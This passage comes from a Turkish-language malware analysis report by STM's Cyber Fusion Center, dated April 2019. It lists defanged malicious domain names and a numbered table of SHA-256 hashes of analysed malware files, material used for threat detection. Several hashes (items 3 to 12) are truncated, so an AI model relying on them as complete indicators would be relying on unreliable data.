493 keller-fenster[.]ch
494 www[.]anhphuoc[.]com[.]vn
495 roue[.]com[.]mx
496 www[.]cerespire[.]com
497 www[.]fratelliditalia[.]it
498 www[.]asiapointpl[.]com
499 www[.]dpsdhuri[.]edu[.]in
500 www[.]aftvec[.]com
e) Analiz Edilen Dosyalara Ait Özet Değeri (Hash) Bilgileri
S.N. Özet Değeri 1 623f558a50bb665a15f50121d0b7a8b54d90108c35e2787f2576016f3fe74dd8
2 d77378dcc42b912e514d3bd4466cdda050dda9b57799a6c97f70e8489dd8c8d0
3 b4b6f6c2588001e5b95eed79faf99a92b9d9224f65af6a92e055ddfb14
4 063cf82cd52acb6a0539a6ff59f72fb5de473293a06c470a92c6d35a15
5 ed8875c88bf061f45601629fbb3faa9f5b9ea4a076ba5a7accd566dc40
6 e7851a1b3e93968e7f6b92a1a3f59d250402be15a5bcb3262acff1e0a2
7 6a8d922e34de35ac074b7de54d71227fb1a1ed92b9cfbc4daf8d64a9c5
8 67c50459db7f0042d7e1a96ce113e60f0179978dfe810bdb0f5320a092
9 99eb1d90eb5f0d012f35fcc2a7dedd2229312794354843637ebb7f40b7
TASNİF DIŞI Zararlı Yazılım
Analiz Raporu
[ SİBER FÜZYON MERKEZİ ] Tarih : 15 Nisan 2019 Rapor No : ZF2019-06-0002
© STM Savunma Teknolojileri Mühendislik ve Ticaret A.Ş. 2019. Her Hakkı Mahfuzdur. Bu doküman veya herhangi bir kısmı STM’nin yazılı izni olmadan çoğaltılamaz, yayınlanamaz ve değiştirilemez. Bu dokümanın dağıtımı veya sunumu ile STM’nin hakları ortadan kalkmış olmaz. Bu doküman
ve içeriği hazırlanma amacının dışında kullanılamaz. TASNİF DIŞI
10 846ad2d7e1e133ae4bc2decbc22ae686a44cccaffbee15b4d9b23143f6
11 b4d0b03ca50f013b4f0f9efc2ecd822bfc13325356100f2f4d36eaf217
12 be54bb05adbda29316ba03d61b3365d8a03e1121a39ae492078787aff4
13 589e188602c4a24c68bc095c1105894a5e97e1df6218eaead89b7ab9a4e88eac
14 69f55139df165bea1fcada0b0174d01240bc40bc21aac4b42992f2e0a0c2ea1d
15 ab0819ae61ecbaa87d893aa239dc82d971cfcce2d44b5bebb4c45e66bb32ec51
16 69f55139df165bea1fcada0b0174d01240bc40bc21aac4b42992f2e0a0c2ea1d
17 6a623b1e016fc0df94fe27a3eb9cc1128c5ee3831a7dcc8e4879427167a41501
18 692c023850bbd95f116d5a623a5e0de9ad0ad13fadb3d89e584cc0aa5dc71f08
19 ad48c3770736588b17b4af2599704b5c86ff8ae6dadd30df59ea2b1ccc221f9c
20 3486088d40d41b251017b4b6d21e742c78be820eaa8fe5d44eee79cf5974477e
21 521fcb199a36d2c3b3bac40b025c2deac472f7f6f46c2eef253132e9f42ed95d
22 9ba87c3c9ac737b5fd5fc0270f902fbe2eabbb1e0d0db64c3a07fea2eeeb5ba6
23 27431cce6163d4456214baacbc9fd163d9e7e16348f41761bac13b65e3947aad
24 ce9c9917b66815ec7e5009f8bfa19ef3d2dfc0cf66be0b4b99b9bebb244d6706
25 0b8618ea4aea0b213278a41436bde306a71ca9ba9bb9e6f0d33aca1c4373b3b5
26 07adce515b7c2d6132713b32f0e28999e262832b47abc26ffc58297053f83257
27 0f8ac8620229e7c64cf45470d637ea9bb7ae9d9f880777720389411b75cbdc2e
28 812a7387e6728f462b213ff0f6ccc3c74aff8c258748e4635e1ddfa3b45927f0
29 d25d1aba05f4a66a90811c31c6f4101267151e4ec49a7f393e53d87499d5ea7a
30 ee24d0d69b4e6c6ad479c886bb0536e60725bfa0becdafecadafc10e7a231a55
31 ab0819ae61ecbaa87d893aa239dc82d971cfcce2d44b5bebb4c45e66bb32ec51
32 3c60a9af0f5538f3bca64a1df5c604a6d194495d8d5a66bcd1a4f09b84015ebb
33 37e660ada1ea7c65de2499f5093416b3db59dfb360fc99c74820c355bf19ec52
34 222ac1b64977c9e24bdaf521a36788b068353c65869469a90b0af8d6c4060f8a
35 cf104f2ad205baee6d9d80e256201ef6758b850576686611c355808a681bec60
36 8ecbfe6f52ae98b5c9e406459804c4ba7f110e71716ebf05015a3a99c995baa1
37 6c1ed5eb1267d95d8a0dc8e1975923ebefd809c2027427b4ead867fb72703f82
38 c9941b3fd655d04763721f266185454bef94461359642eec724d0cf3f198c988
39 0c0def0788b5f946bb2d1a83d883d474550353c98eaffb4456d651cb4bcc3bd9
40 69f55139df165bea1fcada0b0174d01240bc40bc21aac4b42992f2e0a0c2ea1d
41 99eb1d90eb5f0d012f35fcc2a7dedd2229312794354843637ebb7f40b74d0809
42 846ad2d7e1e133ae4bc2decbc22ae686a44cccaffbee15b4d9b23143f6aa8d3f
43 f93379f495ce3c025b8f2ad59779d2de28f00a25b6206572522a71028f925f01
44 8a1e66b4834499dacc24abb27733c387733d919070fc504b14ee865678952559
45 e9bfa9691b48a75fa917a37290cb32b02ded3ae60dab4bcd625e8f390fd345a1
46 786e3c693fcdf55466fd6e5446de7cfeb58a4311442e0bc99ce0b0985c77b45d
47 ef7b107c93e6d605a618fee82d5aeb2b32e3265999f332f624920911aabe1f23
48 06ee45a770fa1a88b62d28059c2c44310f7ff56edbdaf35a0b9c44f2a4e57536
49 f5e74d939a5b329dddc94b75bd770d11c8f9cc3a640dccd8dff765b6997809f2
50 d77378dcc42b912e514d3bd4466cdda050dda9b57799a6c97f70e8489dd8c8d0